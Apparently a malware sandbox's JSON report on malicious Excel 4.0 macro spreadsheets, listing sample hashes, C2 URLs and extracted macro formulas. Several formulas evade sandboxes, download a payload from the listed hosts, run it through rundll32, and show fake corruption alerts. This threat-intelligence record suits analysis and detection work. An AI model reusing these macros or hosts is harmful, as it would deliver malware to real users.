{"version":"0.2","sample":{"sample":"","kind":"file","target":"292b0a5064d74541ef4bb071a56690b68511f6db88bfcc874f7f4f63cbd5439c"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"292b0a5064d74541ef4bb071a56690b68511f6db88bfcc874f7f4f63cbd5439c","filesize":185344,"md5":"9324a6d7cbcd779a74ccbb67510a5056","sha1":"90a8e227a5c55b15dc656cc1b3d0e06a563ea60e","sha256":"292b0a5064d74541ef4bb071a56690b68511f6db88bfcc874f7f4f63cbd5439c","sha512":"50106b0a23088935285c56c690c9119cc259441a83ff7d47ff3df2b357a1ea8c33fb6c48d6b09437e8ea347d065f4ff838f88e168ea0e59ca3f65eb765f4fb60","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"292b0a5064d74541ef4bb071a56690b68511f6db88bfcc874f7f4f63cbd5439c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29309764f3797540df1d9aa7595e1aaa57f7d9bc7c2ff04fab35539bf4cde86a"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"29309764f3797540df1d9aa7595e1aaa57f7d9bc7c2ff04fab35539bf4cde86a","filesize":116224,"md5":"691ba27bafa7e9bd20433f3aff547350","sha1":"3902b0b16caddcc36dc6bac6a10c78b17f7d9510","sha256":"29309764f3797540df1d9aa7595e1aaa57f7d9bc7c2ff04fab35539bf4cde86a","sha512":"b0b83f66b4e227a7f94ec3c36004bf2579c080d7eff55bcbb4349105b1255ea001e32aa15b6c426316ac0786b88ebf54c40ab120e4d765fb4d561eb0d8b5f5ee","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29309764f3797540df1d9aa7595e1aaa57f7d9bc7c2ff04fab35539bf4cde86a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Np7UV910r\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"293636695e1794834cf386c65d585c43471dfd5e8aef5ddf996c1a00c4c9fd7f"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"293636695e1794834cf386c65d585c43471dfd5e8aef5ddf996c1a00c4c9fd7f","filesize":141312,"md5":"13ccae71beff15a13258553f9e1d5895","sha1":"c5ee1ef3ce7eafe14aeeec5f455b0e75a3aef7e6","sha256":"293636695e1794834cf386c65d585c43471dfd5e8aef5ddf996c1a00c4c9fd7f","sha512":"efc09f6adc4ba1b31d92ccaf1b143c6866f7f8527fa4d3eb1124cf2ace310b3571f3b890751687564c32d998e8568e775c025e2f59ea543aa01a7228499fdfad","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"293636695e1794834cf386c65d585c43471dfd5e8aef5ddf996c1a00c4c9fd7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"QOLXH4sCPj\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2940c9397ab992037176986342fb6932219d944a4a96b48a5c31be166acce541"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"2940c9397ab992037176986342fb6932219d944a4a96b48a5c31be166acce541","filesize":209920,"md5":"574b0502ac3a57d972bad67c2bcf3c56","sha1":"b87109b85981020e73dbbc4fcd1ccdb3f19e77c9","sha256":"2940c9397ab992037176986342fb6932219d944a4a96b48a5c31be166acce541","sha512":"c9a59a661c682c0107be132db46dc2c96688b308d1065209caa72de6c1e902efc51703f1cf07d17d36cb5ec83ef5cb848f95095b50394790787695b346fa9978","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2940c9397ab992037176986342fb6932219d944a4a96b48a5c31be166acce541.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2Xppfl2uhl\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2951c65ebfea2ff8710ff327042be89042beae113e6e37d3dddd796fa1585062"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"2951c65ebfea2ff8710ff327042be89042beae113e6e37d3dddd796fa1585062","filesize":116224,"md5":"c45b561487fcbaaf7fc82721c54be768","sha1":"bfb513be798729d5caacd2fc5d33d9725bab83df","sha256":"2951c65ebfea2ff8710ff327042be89042beae113e6e37d3dddd796fa1585062","sha512":"0abade5d4378870716ddbec559148472e61c288d5cef4e3070e093e4dc2e216bfcc7fbd2d24c9bb6acc5436af164cbd978d87f5b6a5d16650ecb3f06589b76ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2951c65ebfea2ff8710ff327042be89042beae113e6e37d3dddd796fa1585062.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OOYZeoPLMu\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2952b4eb3102eaf3234eed91afda8e85b6736fde3cc9a75f8965c25c80ca9a56"},"analysis":{"reported":"2020-04-09T16:15:28Z","score":10},"files":[{"filename":"2952b4eb3102eaf3234eed91afda8e85b6736fde3cc9a75f8965c25c80ca9a56","filesize":168960,"md5":"da2267baa26de02b330b5143ec6fe727","sha1":"102191b66f78abb7c339d713ff266d81836caba4","sha256":"2952b4eb3102eaf3234eed91afda8e85b6736fde3cc9a75f8965c25c80ca9a56","sha512":"b74bdadad765e9ea7bbd5efe13feb4c8304eeb567f11eca7e8276ff7168622168ce63a3e5f88505dc3085ef4744850a33dc2e49f044a21e10985c8164bfc6eb1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2952b4eb3102eaf3234eed91afda8e85b6736fde3cc9a75f8965c25c80ca9a56.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"am7yDFF6ai\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"295fcc2624100d06c7f681493b07f55be6c5b2cb35f03890ae26808e8bd87be9"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"295fcc2624100d06c7f681493b07f55be6c5b2cb35f03890ae26808e8bd87be9","filesize":209920,"md5":"a01f6dc3ad46d42b4fd78c319b3952cb","sha1":"33635a7598c4a3ef2e0b5297d0368c5dc5a1f2fe","sha256":"295fcc2624100d06c7f681493b07f55be6c5b2cb35f03890ae26808e8bd87be9","sha512":"4ef17b29e4b7a7dc1fdaea84ace38614189fdedc7caeabbbef0bcb64d14c6cbaef32a90c55bffae3eeee6ce9df244adecdd77231686ccd81ce36d3d9627403dd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"295fcc2624100d06c7f681493b07f55be6c5b2cb35f03890ae26808e8bd87be9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zw0CdNMhed\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"297ab66480c7815ba1656d43a775fdf1b0b8eb40948578420aa325331a62b9ad"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"297ab66480c7815ba1656d43a775fdf1b0b8eb40948578420aa325331a62b9ad","filesize":109568,"md5":"77735c803a72d797902cda8f30eac91b","sha1":"fe6f6bcdce85e8c102c5ad5d5fe890b7c779e6e1","sha256":"297ab66480c7815ba1656d43a775fdf1b0b8eb40948578420aa325331a62b9ad","sha512":"628552b7e49e19d1624b906c192b263a457b05d96649373120380f74e2eab369f0a13ac8252d0f55e2e9a3efc0141cc1cf9c9babb400a6cadd47b4a3f8f503f0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"297ab66480c7815ba1656d43a775fdf1b0b8eb40948578420aa325331a62b9ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"WqPuzAT26x\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"297e6234666aed75f3c8cd0f32e4cd5c14fb99a9aa0b3028309b573c3f471acd"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"297e6234666aed75f3c8cd0f32e4cd5c14fb99a9aa0b3028309b573c3f471acd","filesize":147968,"md5":"01c72ad5808301a62d399a6f3aeeb720","sha1":"7c91032e9b3db2b54e75544515dc036ed86de7e6","sha256":"297e6234666aed75f3c8cd0f32e4cd5c14fb99a9aa0b3028309b573c3f471acd","sha512":"0e7ee7cff490e7e05241bbee112cbafa71ade5be2d19e27fa6c63f0e1d80a3ac69eba24cccd8cc88a4b7428df43b3ba73dc5b20878493c84d7e6df37853c3880","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"297e6234666aed75f3c8cd0f32e4cd5c14fb99a9aa0b3028309b573c3f471acd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"DMQIoMMNJF\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"298780d0b1b78143327ee4be5eb7af61565738f51750e71d59163c25da7fc289"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"298780d0b1b78143327ee4be5eb7af61565738f51750e71d59163c25da7fc289","filesize":168448,"md5":"9bcd23f188d6494f96fa5ffa15d07130","sha1":"96fc7e67fad2f09d82b4cc46102bd3da37a9b9d8","sha256":"298780d0b1b78143327ee4be5eb7af61565738f51750e71d59163c25da7fc289","sha512":"05cab16fbe7e3a543383760a24df786f7ae3115e2e275bf59387c8eeea64a705f2f2ad523035338e7fbc3fe968d57945139a97d043fd6f973a264c62933ce90e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"298780d0b1b78143327ee4be5eb7af61565738f51750e71d59163c25da7fc289.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"oNPjQV4ika\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29947d5cf3ea7f5b84d6d33c7b9f60cd6383c7ba5d79183cf436ffcada96faa3"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"29947d5cf3ea7f5b84d6d33c7b9f60cd6383c7ba5d79183cf436ffcada96faa3","filesize":141824,"md5":"29425b62c905e1172d6c38d2189058cb","sha1":"fbc5ebdadef26ff303203bfc23229d40341151f9","sha256":"29947d5cf3ea7f5b84d6d33c7b9f60cd6383c7ba5d79183cf436ffcada96faa3","sha512":"24f33816f376a7a5c5a0f4f17bcfb2f870a9a970e97ba42486140a012cf9b041d4f51fe90b47301e7b68af49eb276e2285971dff4377e5456baa18a607250391","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29947d5cf3ea7f5b84d6d33c7b9f60cd6383c7ba5d79183cf436ffcada96faa3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"dZOBuuDlp0\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"299df73059d3921e5d3b6fb0e4648cd25cb775bb13eb7dde5cd0447ab71e5337"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"299df73059d3921e5d3b6fb0e4648cd25cb775bb13eb7dde5cd0447ab71e5337","filesize":167936,"md5":"d6ad0d2bd9dbaea0f78005bebbeccb58","sha1":"90501692d99e0e7834d08c081c4bf6e1185e6b88","sha256":"299df73059d3921e5d3b6fb0e4648cd25cb775bb13eb7dde5cd0447ab71e5337","sha512":"259312db74f2da19089d79489a075e11dfa4647f5dc760ce0174fe8ffff9ba9fcca2cdc640e312881f527b4dfe3f51997d79a0675a9b4d846b55a0b8e0cbb7ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"299df73059d3921e5d3b6fb0e4648cd25cb775bb13eb7dde5cd0447ab71e5337.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HvVTwWaLSM\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29a37dbc5e044bcc61becc1979586432a4ab88943c85f2f2cfdd3b3baa455b00"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"29a37dbc5e044bcc61becc1979586432a4ab88943c85f2f2cfdd3b3baa455b00","filesize":185344,"md5":"3d9ac13ca0ee27dc779584f4639d2072","sha1":"b4e897727b38a3b1ebc49bfaf93aef0425e15628","sha256":"29a37dbc5e044bcc61becc1979586432a4ab88943c85f2f2cfdd3b3baa455b00","sha512":"563573cab5ac9e1b8685e9f6ba301c8e4c4f95f5ff960947d26adad726830195cbc22f0bae09e3d458aedf5040c103bdb2ab52007e45876b9cb2a2d38aac162b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29a37dbc5e044bcc61becc1979586432a4ab88943c85f2f2cfdd3b3baa455b00.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29bb8860ad9bbe1404e153c8d8d8a34e48c8adde4ab6d42d0cdd2b76b8cac1d2"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"29bb8860ad9bbe1404e153c8d8d8a34e48c8adde4ab6d42d0cdd2b76b8cac1d2","filesize":104448,"md5":"ea757ff56d15b885a8f8b94b687233b3","sha1":"5280cb2901fd628cc8de25ea333a8d5fc5229a76","sha256":"29bb8860ad9bbe1404e153c8d8d8a34e48c8adde4ab6d42d0cdd2b76b8cac1d2","sha512":"26c5806f2b020503088bd41731625b292a202610e8523284e9f7ad851cd57c559b18a2485781bc9d93db8e755fee5fb8d7f3909368d273168a13ab900ebee9a5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29bb8860ad9bbe1404e153c8d8d8a34e48c8adde4ab6d42d0cdd2b76b8cac1d2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"G4Dov2syH8\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29c132fe6f82a83f7c72914a48f2051b1efa1039996db7e56fc394f08885bb12"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"29c132fe6f82a83f7c72914a48f2051b1efa1039996db7e56fc394f08885bb12","filesize":112640,"md5":"ed35b1cacd3cebfdea2a09af23c79eae","sha1":"f127b3963b3c3c89e666a803a05da1977ff7a605","sha256":"29c132fe6f82a83f7c72914a48f2051b1efa1039996db7e56fc394f08885bb12","sha512":"39c67a6d748005b260056aecf98f83f5478c4cda6816555a597e70e1750bfd5157bc4d15d06ade034f41d4b197a11da57ddf55f9b0133cde8a486b60d8f4f5d0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29c132fe6f82a83f7c72914a48f2051b1efa1039996db7e56fc394f08885bb12.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"29e6cb79e1d8ac79dc4f3de87f77a20ce41ed41d68106ceb506b1645c4289e5d"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"29e6cb79e1d8ac79dc4f3de87f77a20ce41ed41d68106ceb506b1645c4289e5d","filesize":167936,"md5":"382e5f5398ff1cad7b895a8657191caf","sha1":"5e5dd0abd4167d93674057b70355f060113c6f78","sha256":"29e6cb79e1d8ac79dc4f3de87f77a20ce41ed41d68106ceb506b1645c4289e5d","sha512":"095b8375b3b986b5161cb464fe4a472583422af4365e80a7071dea8e68be3b77836f4fbd79e6ff8efa30bc94385eda4cb0b79dc8240ab1b97dd7cb14457a60fd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"29e6cb79e1d8ac79dc4f3de87f77a20ce41ed41d68106ceb506b1645c4289e5d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VIBo4dh8jw\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2a049e7431ddc3b1e8d730e3ed57d7b1c3a05070872634089ba127b833e636d1"},"analysis":{"reported":"2020-04-09T16:15:29Z","score":10},"files":[{"filename":"2a049e7431ddc3b1e8d730e3ed57d7b1c3a05070872634089ba127b833e636d1","filesize":206336,"md5":"0a633056a76e6ec7cddf0a7e96bb35b4","sha1":"7f2e2e569c9b7036edcf0693960a2de403327d35","sha256":"2a049e7431ddc3b1e8d730e3ed57d7b1c3a05070872634089ba127b833e636d1","sha512":"28c2f88038336df6bf0fba37be09c5cf2f4456218861ec1137eea27a5ee41599c02b6e52d835c86b056585a9acdf73b691dc6f3b474ba6f9de5d652485b0d19a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2a049e7431ddc3b1e8d730e3ed57d7b1c3a05070872634089ba127b833e636d1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 